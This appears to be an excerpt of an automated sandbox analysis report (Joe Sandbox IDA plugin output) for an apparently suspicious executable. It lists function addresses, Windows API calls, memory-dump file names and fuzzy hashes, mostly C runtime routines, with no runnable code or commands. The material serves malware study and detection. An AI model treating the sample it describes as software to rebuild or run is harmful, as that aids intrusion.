                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                  • Opcode ID: 1f418fde0bcffb0ec163c6b2ed5a7c11c72ef185043321b2b507dff462092f4a
                                                                                                                                                                                                                                                                  • Instruction ID: 4e213eb5ff6234659d41775d869ced2e33ac766cf23d488d3e7fde7a1a85706f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f418fde0bcffb0ec163c6b2ed5a7c11c72ef185043321b2b507dff462092f4a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F3E04F31940218BFCF222F61DD09EAE3F66EF84791F044012FD1575261CF328922EAD4
                                                                                                                                                                                                                                                                  Function 00ECB640 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0000B761), ref: 00ECB645
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5d78868dab7a3afbd28b6c612599212b2bd512afd991be43b3175590a6e8b803
                                                                                                                                                                                                                                                                  • Instruction ID: b5ad4e364d90d23a3f9bed8997a52a7c76f5528b2268d8fd1edda97f0d81a87a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d78868dab7a3afbd28b6c612599212b2bd512afd991be43b3175590a6e8b803
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                  Function 00ED8D25 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                                                                                                                                                  • Opcode ID: 93a97dafdb3e0781202193416f177aec37cacb956adbe8c0595a3e133b109c6c
                                                                                                                                                                                                                                                                  • Instruction ID: ba956dd6a609a99ee3dcf5b8ebdacae04009686431580ada725080ff82670528
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93a97dafdb3e0781202193416f177aec37cacb956adbe8c0595a3e133b109c6c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2CA002706021058F67408F365E0521A35D96BC559170544656415D5171E6658554D601
                                                                                                                                                                                                                                                                  Function 00EF5000 Relevance: .1, Instructions: 109COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 82deebe24201b636904a8fd7d9e25c9dde6b44f444a07b28b64b2e34180a6b56
                                                                                                                                                                                                                                                                  • Instruction ID: 2196f7a62e960d9736eb84177a20ab19c087add38d4b7c8ec70099f05c72e7d1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82deebe24201b636904a8fd7d9e25c9dde6b44f444a07b28b64b2e34180a6b56
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81519AB0D0020D9FCB40DFA8D691AEEBBF0EB49350F20945AE915FB311D731AA41CB65
                                                                                                                                                                                                                                                                  Function 00EF55D0 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 50354f0752e92480b21629dab8b898696166aeb74879c7073d07f2ccae59bbaa
                                                                                                                                                                                                                                                                  • Instruction ID: 65adfbd8eef9f7bf1bd9d1abcd0511519fe7c3cc4492b247fd15d2162319e91e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50354f0752e92480b21629dab8b898696166aeb74879c7073d07f2ccae59bbaa
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CAD0923A641A58AFC210CF5AE440D41F7B8FBCD670B154066EA08A7B20C331FC11CAE0
                                                                                                                                                                                                                                                                  Function 00EE5DA2 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(00A30F68,00A30F68,00000000,7FFFFFFF,?,00EE5D8D,00A30F68,00A30F68,00000000,00A30F68,?,?,?,?,00A30F68,00000000), ref: 00EE5E48
                                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00EE5F03
                                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00EE5F92
                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00EE5FDD
                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00EE5FE3
                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00EE6019
                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00EE601F
                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00EE602F
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 127012223-0
                                                                                                                                                                                                                                                                  • Opcode ID: d0d0d31a999950909ae509e94c674a72c8b223919f507c8b4958c338d070abb8
                                                                                                                                                                                                                                                                  • Instruction ID: 6b2d059046d7d9a8d572cc668fe8663642730e58d01a23e3305402e617ebe20a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0d0d31a999950909ae509e94c674a72c8b223919f507c8b4958c338d070abb8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD71F633A0468D9BDF209B968D42FAE7BE59F5535CF28201AE904BB291EB31DD01C750
                                                                                                                                                                                                                                                                  Function 00ECBC65 Relevance: 12.2, APIs: 8, Instructions: 177COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 00ECBCAC
                                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00ECBCD8
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00ECBD17
                                                                                                                                                                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ECBD34
                                                                                                                                                                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00ECBD73
                                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00ECBD90
                                                                                                                                                                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00ECBDD2
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00ECBDF5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2040435927-0
                                                                                                                                                                                                                                                                  • Opcode ID: 98b2555ec99e5a2083e92baf5aaf0c8ff8d2277d4e5a42dabe79c9107e522025
                                                                                                                                                                                                                                                                  • Instruction ID: 3df9d2321f9a4b8d9bbd921b472c6eb4be17a735db705bc3d7b8b6906f353435
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 98b2555ec99e5a2083e92baf5aaf0c8ff8d2277d4e5a42dabe79c9107e522025
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C951C17290020AAFEF204F51DD46FFB7BA9EF80B44F24402DFA15B6191DB728C128B90
                                                                                                                                                                                                                                                                  Function 00EDA29B Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _strrchr
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3213747228-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8e0f97e4647312b9ceead5f539edeb0fd48669250f67cc87fd716c991951b375
                                                                                                                                                                                                                                                                  • Instruction ID: 79c67752e7e65f0f33c240ac6a1da9fb479f307a2a72fbd005ccc54760f5ceb0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e0f97e4647312b9ceead5f539edeb0fd48669250f67cc87fd716c991951b375
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CDB14672A003959FDB118F68CC81BEEBBA5EF55314F1C5176E904BB382D2759A02C7A2
                                                                                                                                                                                                                                                                  Function 00ECCBA0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00ECCBD7
                                                                                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00ECCBDF
                                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00ECCC68
                                                                                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00ECCC93
                                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00ECCCE8
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                  • Opcode ID: 01b9751d4fd2f1fc27fef68d9e754a262130e4603ebd2614c5b81025bd7243a3
                                                                                                                                                                                                                                                                  • Instruction ID: 952864af9ac2fdcca251d0e280a4abc91446d0c9115a44fc0b0b93681b622a3a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 01b9751d4fd2f1fc27fef68d9e754a262130e4603ebd2614c5b81025bd7243a3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E741C330A002189BCB14DF69C981F9EBBE1EF45314F249159E81DBB352D7329A47CB91
                                                                                                                                                                                                                                                                  Function 00ECBB07 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 116threadCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00ECBB1B
                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00EE7328,000000FF,?,00EC892E), ref: 00ECBB3A
                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00EE7328,000000FF,?,00EC892E), ref: 00ECBB68
                                                                                                                                                                                                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00EE7328,000000FF,?,00EC892E), ref: 00ECBBC3
                                                                                                                                                                                                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00EE7328,000000FF,?,00EC892E), ref: 00ECBBDA
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                                                                                  • String ID: (s
                                                                                                                                                                                                                                                                  • API String ID: 66001078-975861361
                                                                                                                                                                                                                                                                  • Opcode ID: 129504b57bce177ef5e99c910deff0a945ad710543ccc2b3227d2884fcb298cf
                                                                                                                                                                                                                                                                  • Instruction ID: 94e7163b6567e51111c7f1915604823b15086816f85ea2489b8becac689c963c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 129504b57bce177ef5e99c910deff0a945ad710543ccc2b3227d2884fcb298cf
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E41243090060ADFCB20DF65C682EAAF3E4EB44314F10596EE456A7654D732A986CB51
                                                                                                                                                                                                                                                                  Function 00EF5C74 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63registrywindowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ClassHandleMessageModuleRegister
                                                                                                                                                                                                                                                                  • String ID: ($Melon$Z
                                                                                                                                                                                                                                                                  • API String ID: 1585107554-3138928526
                                                                                                                                                                                                                                                                  • Opcode ID: 7e98c2c8e981332dd0d001387cefc6b22843ec89c77192ae5248fd1c9798e86a
                                                                                                                                                                                                                                                                  • Instruction ID: 34eb792b3045beabb2a316b12ad6307e0cd064ea2cd061c0b99f69f6f571a699
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e98c2c8e981332dd0d001387cefc6b22843ec89c77192ae5248fd1c9798e86a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5621C8B1905208DFDB44DFA8D5897AEBBF0BF88304F11882EE449EB254E7759948CB42
                                                                                                                                                                                                                                                                  Function 00ECBEDC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00ECBEE2
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00ECBEF0
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00ECBF01
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
